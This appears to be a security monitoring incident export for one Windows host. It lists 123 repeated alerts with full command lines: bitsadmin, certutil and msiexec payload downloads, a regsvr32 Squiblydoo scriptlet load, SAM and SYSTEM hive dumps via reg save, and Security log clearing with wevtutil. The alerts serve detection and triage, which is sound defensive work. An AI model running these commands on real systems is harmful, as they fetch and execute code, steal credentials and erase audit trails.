Incident Overview

Incident ID: CINC-20251220-570CB2D3
Severity: Critical (90)
Status: new
Alert Count: 123
Host Count: 1

Timeline

First Seen: 2025-12-18 08:32:18
Last Seen: 2025-12-18 19:59:06
Duration: 0d 11h 26m
Created: 2025-12-20 13:23
Updated: 2026-01-13 15:14

Kill Chain Analysis

Observed Tactics: Defense Evasion, Credential Access, Command and Control, Persistence, Execution
Techniques: BITS Jobs, Indicator Removal, OS Credential Dumping, Regsvr32, Ingress Tool Transfer, Event Triggered Execution, User Execution

Affected Hosts (1)

TEAHEE

Related Alerts (123)

Severity Status Hostname Description Tactic Command Line Time
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 19:59
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 19:51
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 19:48
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 19:48
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 19:31
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 19:31
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 14:35
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 14:35
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 13:49
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 13:42
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 13:39
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 13:38
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 13:38
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 13:38
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 12:42
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 12:39
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 12:38
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 12:38
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 12:38
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 12:35
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 11:42
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 11:42
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 11:38
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 11:38
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 11:38
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 11:35
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 10:50
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:46
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 10:42
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:42
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:39
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 10:39
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 10:35
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:35
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 10:35
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:32
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:28
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 10:28
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:25
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 10:25
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 10:21
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:18
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:14
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 10:11
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 10:07
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 10:03
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 10:00
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:57
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:56
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:53
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:53
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:49
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:49
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 09:46
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:46
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:42
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:42
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:42
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 09:42
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:39
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:39
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:39
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:35
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:35
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 09:35
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:32
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:32
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:28
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:28
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:25
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:25
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:25
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:21
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:21
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 09:21
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 09:18
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:18
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 09:14
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:14
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 09:14
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:14
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:11
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:11
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:11
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 09:07
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 09:07
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:07
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 09:04
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 09:04
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:04
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:04
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:04
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 09:00
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 09:00
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:00
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:00
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 08:57
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 08:57
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 08:53
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 08:53
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 08:53
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 08:50
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 08:49
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 08:49
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 08:49
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 08:49
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 08:46
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 08:46
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 08:42
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 08:42
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 08:42
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 08:39
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 08:39
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 08:39
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 08:39
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 08:39
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 08:35
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 08:35
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 08:35
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 08:35
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 08:35
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 08:35
